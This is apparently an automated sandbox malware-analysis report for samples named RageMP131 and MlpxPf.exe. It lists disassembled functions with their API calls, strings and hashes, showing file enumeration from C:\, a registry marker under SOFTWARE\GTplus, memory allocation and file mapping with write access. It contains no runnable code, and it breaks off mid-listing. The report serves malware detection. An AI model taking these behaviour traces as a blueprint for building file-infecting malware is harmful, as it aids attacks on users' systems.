Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: aacad2cc5f00980e1902ffa1c871d65dcee9c9cccacb2b3cf6c6d14967f10433
Instruction ID: 89bad5c11442c4e85bb3cb54707244323367914a7253a9c2811b486e9efa61a8
Opcode Fuzzy Hash: aacad2cc5f00980e1902ffa1c871d65dcee9c9cccacb2b3cf6c6d14967f10433
Instruction Fuzzy Hash: D36128719003099FDB08CF68DD85B9EBBB5FF44314F148618F415AB7D2EB74AA848B91

Function 009A34C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 009A3946
___std_exception_destroy.LIBVCRUNTIME ref: 009A395F
___std_exception_destroy.LIBVCRUNTIME ref: 009A3A97
___std_exception_destroy.LIBVCRUNTIME ref: 009A3AB0
___std_exception_destroy.LIBVCRUNTIME ref: 009A3C16
___std_exception_destroy.LIBVCRUNTIME ref: 009A3C2F
___std_exception_destroy.LIBVCRUNTIME ref: 009A4479
___std_exception_destroy.LIBVCRUNTIME ref: 009A4492

Strings

value, xrefs: 009A439F

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 470a5c1ee603e207425f0e4ff73c58ca0591b0618fe30084c707547dae84bff3
Instruction ID: 4b288b9d4122b5633d8f7b374712cea3b072ef78713ab8e9d9f0f4d17765d49a
Opcode Fuzzy Hash: 470a5c1ee603e207425f0e4ff73c58ca0591b0618fe30084c707547dae84bff3
Instruction Fuzzy Hash: 0951E270C0024CDBDF14DFA8DD89BDEBBB4BF46304F148659E455A7282DB746A88CBA1

Function 00933B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00933C0F

Strings

ios_base::failbit set, xrefs: 00933AC8, 00933BB1
ios_base::badbit set, xrefs: 00933BA7, 00933BD2, 00933BF3
ios_base::eofbit set, xrefs: 00933BB6

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: 725452fcc27b59f85d41ca07c08f62de221ee8e69feb545f249cddd4d6a90f7a
Instruction ID: 5eb20a770dc8ca77eb1b1575400218780104bec54831b5ca6a7e1806ff2bc709
Opcode Fuzzy Hash: 725452fcc27b59f85d41ca07c08f62de221ee8e69feb545f249cddd4d6a90f7a
Instruction Fuzzy Hash: 1311C0B29507086BC710DF59D801BA6F7E8AF44320F08C92AFD58DB281F774A914CF91

Function 009A2A60 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 009A2F43

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 15505ae4584f91191ef75b2f158c6094fda56cdb4592a16f99b658929fda9251
Instruction ID: b5117a28da477e9e8117b29fdda195bdf4d8bcf490abf96006e06ce4e3015a75
Opcode Fuzzy Hash: 15505ae4584f91191ef75b2f158c6094fda56cdb4592a16f99b658929fda9251
Instruction Fuzzy Hash: 36E1C071A002059FCB18DF6CC895A6DBBB5FF89310F248669E8199B395E730ED51CBD0

Function 00938080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0093844D

Strings

parse error, xrefs: 00938149, 00938162
ror, xrefs: 009380D4

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: eaeef6b1b14fea8973f99ecd35b966bab7717630b8d2b4d92eb54b3b4d896e50
Instruction ID: 8dae91ea564b0e46a1e93356f6440c0948cae5caaca03768bb6a1b18090bed8a
Opcode Fuzzy Hash: eaeef6b1b14fea8973f99ecd35b966bab7717630b8d2b4d92eb54b3b4d896e50
Instruction Fuzzy Hash: 6AC1E4719107499FDB08CF68CD89BAEBB72BF55304F148348F404AB692DB74AA85CF91

Function 00937DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00938051
___std_exception_destroy.LIBVCRUNTIME ref: 00938060

Strings

[json.exception., xrefs: 00937E1C

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 35fe1b558269db3a27ef9080ade52d0524b0f384cad1b15d31057313e4c8cbcc
Instruction ID: 11d8f94e84c57d37080adff44ffaa6d993cd5cfc2db84bd355e6c3748303459f
Opcode Fuzzy Hash: 35fe1b558269db3a27ef9080ade52d0524b0f384cad1b15d31057313e4c8cbcc
Instruction Fuzzy Hash: C69107709002099FDB18CFA8CC85BDEFBB5FF45314F144659F400AB6A2D7B4AA84CB91

Function 00933A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00933C0F

Strings

ios_base::failbit set, xrefs: 00933AC8
ios_base::badbit set, xrefs: 00933BA7, 00933BD2, 00933BF3

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 3fd519e47d4596a7e9b6f86a184526ed051c8c0c5997a58841d6b3f5192ad832
Instruction ID: 3ac0523ff6c317e8b9404c43cb18fe62fbbbea08d92b449aca7724ad9ef23f03
Opcode Fuzzy Hash: 3fd519e47d4596a7e9b6f86a184526ed051c8c0c5997a58841d6b3f5192ad832
Instruction Fuzzy Hash: 5F4103B1910308ABCB04DF58DC45BAAF7B8EF45320F14861AF954A7681E774AA40CFA1

Function 009A45C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 009A4E29
___std_exception_destroy.LIBVCRUNTIME ref: 009A4E42
___std_exception_destroy.LIBVCRUNTIME ref: 009A594D
___std_exception_destroy.LIBVCRUNTIME ref: 009A5966

Strings

value, xrefs: 009A5873

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: e8a7554de694eb0bf6ca26e3e47ab43575f3f98d048b822e0e50a52067c580d9
Instruction ID: 8c79f2891ce36ccf24cd387c0b5711a10441b0031068c9da70ffa8d46329e676
Opcode Fuzzy Hash: e8a7554de694eb0bf6ca26e3e47ab43575f3f98d048b822e0e50a52067c580d9
Instruction Fuzzy Hash: CB51DFB0D00248DBDF14DFA4DC89BDEBBB4BF46304F144259E454AB282D7746A888B92

Function 009A99A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 009A99F1

Strings

type must be boolean, but is , xrefs: 009A9AE2
type must be string, but is , xrefs: 009A9A58

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: eaad62cc9a243781514cb76e0a142b4e07cae38081b1c5199c769301584f0080
Instruction ID: a7c8e8a12d8a5a466b5f381068db50c61927a4dccc4ac92009644a4c03026049
Opcode Fuzzy Hash: eaad62cc9a243781514cb76e0a142b4e07cae38081b1c5199c769301584f0080
Instruction Fuzzy Hash: 90316CB5904248AFCB04EBA4D842BAFB7BCFB45300F144669F415D7682EB34AA04C792

Analysis Process: MlpxPf.exePID: 7588, Parent PID: 7572COMMON

Execution Graph

Execution Coverage:	26.1%
Dynamic/Decrypted Code Coverage:	10.3%
Signature Coverage:	0%
Total number of Nodes:	300
Total number of Limit Nodes:	14

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 005929E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00592A02
wsprintfA.USER32 ref: 00592A1A
memset.MSVCRT ref: 00592A44
lstrlen.KERNEL32(?), ref: 00592A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00592A6C
strrchr.MSVCRT ref: 00592A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00592A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00592AAE
memset.MSVCRT ref: 00592AC6
memset.MSVCRT ref: 00592ADA
FindFirstFileA.KERNELBASE(?,?), ref: 00592AEF
memset.MSVCRT ref: 00592B13
lstrcmpiA.KERNEL32(?,?), ref: 00592B42
FindNextFileA.KERNELBASE(00000000,?,?,?,?), ref: 00592B67
FindClose.KERNELBASE(00000000), ref: 00592B6E

Strings

%s*, xrefs: 00592A14
Documents and Settings, xrefs: 00592A8D, 00592A92, 00592A9A, 00592AAD
C:\, xrefs: 00592A2F

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: ab547d4a878bae447211bd45e7bd5716fdefa7659d949dc6c76ad0f39ecfa44b
Instruction ID: a70746f7e6d78dfcac24dfa51d5855bcc21d08ffd72ae96832c21c7af0c16f09
Opcode Fuzzy Hash: ab547d4a878bae447211bd45e7bd5716fdefa7659d949dc6c76ad0f39ecfa44b
Instruction Fuzzy Hash: FC4141B2404349BFDB20DBA0DC4DDEB7BECFB94315F04082AF544D2111E634DA589BA2

Function 00596076 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 615
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 005960BE
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 005960DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00596189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 005961A5

Strings

kernel32.dll, xrefs: 005964A7

Memory Dump Source

Source File: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: kernel32.dll
API String ID: 2087232378-1793498882
Opcode ID: 57392ed85d71d72a391a9c1ee219f78c80ce79bbad3bdefca44d300379009dbe
Instruction ID: a607187470feeeb83745a9dcc0195317d5ae804dfdb08735b76de7923223da78
Opcode Fuzzy Hash: 57392ed85d71d72a391a9c1ee219f78c80ce79bbad3bdefca44d300379009dbe
Instruction Fuzzy Hash: E31221B25087858FDF328F64CC95BEA3FB4FF02310F1945AED8898B192D674A908C751

Function 00591718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\MlpxPf.exe), ref: 00591729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0059174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0059177C
__aulldiv.LIBCMT ref: 00591796
__aulldiv.LIBCMT ref: 005917A8

Strings

Time, xrefs: 0059173D, 00591766
C:\Users\user\AppData\Local\Temp\MlpxPf.exe, xrefs: 00591722
SOFTWARE\GTplus, xrefs: 00591742, 0059176B

Memory Dump Source

Source File: 00000012.00000002.1801908378.0000000000591000.00000020.00000001.01000000.00000004.sdmp, Offset: 00590000, based on PE: true

Associated: 00000012.00000002.1801843051.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1801946053.0000000000593000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802445886.0000000000594000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000012.00000002.1802529130.0000000000596000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_590000_MlpxPf.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\MlpxPf.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-2397731975
Opcode ID: 4d921809d40679e52f0d9cd9bef011e07ec6d6c875622af7ae24bb40f93f5141
Instruction ID: 3324f9893490aebafad8f03930cbe40e79d0ae96ab69713fe1edca02508bf970
Opcode Fuzzy Hash: 4d921809d40679e52f0d9cd9bef011e07ec6d6c875622af7ae24bb40f93f5141
Instruction Fuzzy Hash: 21118E76A0021AFBDF109BD4C889FEF7FBCFB50B10F108015F901A6281D6719A48DB64

Function 00591E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNELBASE(?,00000080,?,005932B0,00000164,00592986,?), ref: 00591EB9
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00591ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00591EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00591F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00591F1D
